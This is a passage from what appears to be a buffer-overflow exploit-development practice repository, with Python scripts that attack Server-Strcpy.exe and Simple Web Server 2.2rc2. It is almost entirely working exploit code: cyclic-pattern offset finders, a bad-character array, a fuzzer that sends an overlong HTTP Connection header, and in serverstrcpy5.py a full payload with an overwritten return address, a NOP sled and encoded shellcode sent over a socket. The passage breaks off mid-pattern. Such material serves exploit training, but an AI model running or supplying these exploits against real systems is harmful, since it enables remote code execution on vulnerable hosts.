"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9" 14 | 15 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | s.connect((target, int(port))) 17 | print "[+] sending payload of length", len(buffer) 18 | s.send(buffer) 19 | s.close() 20 | print "[+] done" 21 | 22 | if __name__ == "__main__": 23 | main(sys.argv[1], sys.argv[2]) 24 | -------------------------------------------------------------------------------- /server-strcpy/serverstrcpy3.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | # Server-Strcpy.exe exploit by superkojiman 4 | # http://blog.techorganic.com 5 | 6 | import socket, sys 7 | 8 | 9 | 10 | 11 | def main(target, port): 12 | #buffer = "\x41" * 900 13 | buffer = "\x41" * 268 + "B" * 4 14 | # buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9" 15 | #[*] Exact match at offset 268 16 | 17 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | s.connect((target, int(port))) 19 | print "[+] sending payload of length", len(buffer) 20 | s.send(buffer) 21 | s.close() 22 | print "[+] done" 23 | 24 | if __name__ == "__main__": 25 | main(sys.argv[1], sys.argv[2]) 26 | -------------------------------------------------------------------------------- /server-strcpy/serverstrcpy4.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | # Server-Strcpy.exe exploit by superkojiman 4 | # http://blog.techorganic.com 5 | 6 | import socket, sys 7 | 8 | 9 | 10 | 11 | 12 | def main(target, port): 13 | #buffer = "\x41" * 900 14 | badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 15 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 16 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 17 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 18 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 19 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 20 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 21 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 22 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 23 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 24 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 25 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 26 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 27 | badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 28 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 29 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 30 | 31 | 32 | 33 | buffer = "\x41" * 268 + "B" * 4 + badchars 34 | # buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9" 35 | #[*] Exact match at offset 268 36 | 37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | s.connect((target, int(port))) 39 | print "[+] sending payload of length", len(buffer) 40 | s.send(buffer) 41 | s.close() 42 | print "[+] done" 43 | 44 | if __name__ == "__main__": 45 | main(sys.argv[1], sys.argv[2]) 46 | -------------------------------------------------------------------------------- /server-strcpy/serverstrcpy5.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | # Server-Strcpy.exe exploit by superkojiman 4 | # http://blog.techorganic.com 5 | 6 | import socket, sys 7 | 8 | 9 | shellcode = ( 10 | "\xdb\xc4\xd9\x74\x24\xf4\xbb\x24\xa5\x7b\x0c\x58\x29\xc9\xb1" + 11 | "\x53\x31\x58\x17\x03\x58\x17\x83\xe4\xa1\x99\xf9\x18\x41\xdf" + 12 | "\x02\xe0\x92\x80\x8b\x05\xa3\x80\xe8\x4e\x94\x30\x7a\x02\x19" + 13 | "\xba\x2e\xb6\xaa\xce\xe6\xb9\x1b\x64\xd1\xf4\x9c\xd5\x21\x97" + 14 | "\x1e\x24\x76\x77\x1e\xe7\x8b\x76\x67\x1a\x61\x2a\x30\x50\xd4" + 15 | "\xda\x35\x2c\xe5\x51\x05\xa0\x6d\x86\xde\xc3\x5c\x19\x54\x9a" + 16 | "\x7e\x98\xb9\x96\x36\x82\xde\x93\x81\x39\x14\x6f\x10\xeb\x64" + 17 | "\x90\xbf\xd2\x48\x63\xc1\x13\x6e\x9c\xb4\x6d\x8c\x21\xcf\xaa" + 18 | "\xee\xfd\x5a\x28\x48\x75\xfc\x94\x68\x5a\x9b\x5f\x66\x17\xef" + 19 | "\x07\x6b\xa6\x3c\x3c\x97\x23\xc3\x92\x11\x77\xe0\x36\x79\x23" + 20 | "\x89\x6f\x27\x82\xb6\x6f\x88\x7b\x13\xe4\x25\x6f\x2e\xa7\x21" + 21 | "\x5c\x03\x57\xb2\xca\x14\x24\x80\x55\x8f\xa2\xa8\x1e\x09\x35" + 22 | "\xce\x34\xed\xa9\x31\xb7\x0e\xe0\xf5\xe3\x5e\x9a\xdc\x8b\x34" + 23 | "\x5a\xe0\x59\xa0\x52\x47\x32\xd7\x9f\x37\xe2\x57\x0f\xd0\xe8" + 24 | "\x57\x70\xc0\x12\xb2\x19\x69\xef\x3d\x34\x36\x66\xdb\x5c\xd6" + 25 | "\x2e\x73\xc8\x14\x15\x4c\x6f\x66\x7f\xe4\x07\x2f\x69\x33\x28" + 26 | "\xb0\xbf\x13\xbe\x3b\xac\xa7\xdf\x3b\xf9\x8f\x88\xac\x77\x5e" + 27 | "\xfb\x4d\x87\x4b\x6b\xed\x1a\x10\x6b\x78\x07\x8f\x3c\x2d\xf9" + 28 | "\xc6\xa8\xc3\xa0\x70\xce\x19\x34\xba\x4a\xc6\x85\x45\x53\x8b" + 29 | "\xb2\x61\x43\x55\x3a\x2e\x37\x09\x6d\xf8\xe1\xef\xc7\x4a\x5b" + 30 | "\xa6\xb4\x04\x0b\x3f\xf7\x96\x4d\x40\xd2\x60\xb1\xf1\x8b\x34" + 31 | "\xce\x3e\x5c\xb1\xb7\x22\xfc\x3e\x62\xe7\x0c\x75\x2e\x4e\x85" + 32 | "\xd0\xbb\xd2\xc8\xe2\x16\x10\xf5\x60\x92\xe9\x02\x78\xd7\xec" + 33 | "\x4f\x3e\x04\x9d\xc0\xab\x2a\x32\xe0\xf9") 34 | 35 | def main(target, port): 36 | #buffer = "\x41" * 900 37 | #0x7E47BCAF 38 | buffer = "\x41" * 268 + "\xAF\xBC\x47\x7E" + "\x90" * 20 + shellcode 39 | #+ shellcode 40 | # buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9" 41 | #[*] Exact match at offset 268 42 | 43 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 44 | s.connect((target, int(port))) 45 | print "[+] sending payload of length", len(buffer) 46 | s.send(buffer) 47 | s.close() 48 | print "[+] done" 49 | 50 | if __name__ == "__main__": 51 | main(sys.argv[1], sys.argv[2]) 52 | -------------------------------------------------------------------------------- /simplewebserver/142ba80cfca8f99ac36c92535728844c-sws-2.2-rc2-i686.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice/ef3426ace0f4c4fc9fce612eba811a9c8988bb66/simplewebserver/142ba80cfca8f99ac36c92535728844c-sws-2.2-rc2-i686.exe -------------------------------------------------------------------------------- /simplewebserver/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #################################################################### 4 | # Application: Simple Web Server 2.2rc2 # 5 | # Author: VOSEC # 6 | # Website: https://veilofsecurity.com # 7 | # Tested OS: Windows 7 SP1 32bit # 8 | #################################################################### 9 | 10 | import socket 11 | import sys 12 | 13 | ip = "11.11.11.7" 14 | port = 80 15 | 16 | junk = "A"*4992 17 | jmp = "B"*4 18 | retn = "C"*4 19 | shellcode = "" 20 | 21 | req = "GET / HTTP/1.1\r\n" 22 | req += "Host: 11.11.11.7\r\n" 23 | req += "Connection:" + junk + jmp + retn + shellcode + "\r\n" 24 | req += "\r\n" 25 | 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.connect((ip, port)) 28 | s.send(req) 29 | s.close() 30 | -------------------------------------------------------------------------------- /simplewebserver/offsetcalculate.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #################################################################### 4 | # Application: Simple Web Server 2.2rc2 # 5 | # Author: VOSEC # 6 | # Website: https://veilofsecurity.com # 7 | # Tested OS: Windows 7 SP1 32bit # 8 | #################################################################### 9 | 10 | import socket 11 | import sys 12 | 13 | ip = "11.11.11.7" 14 | port = 80 15 | junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb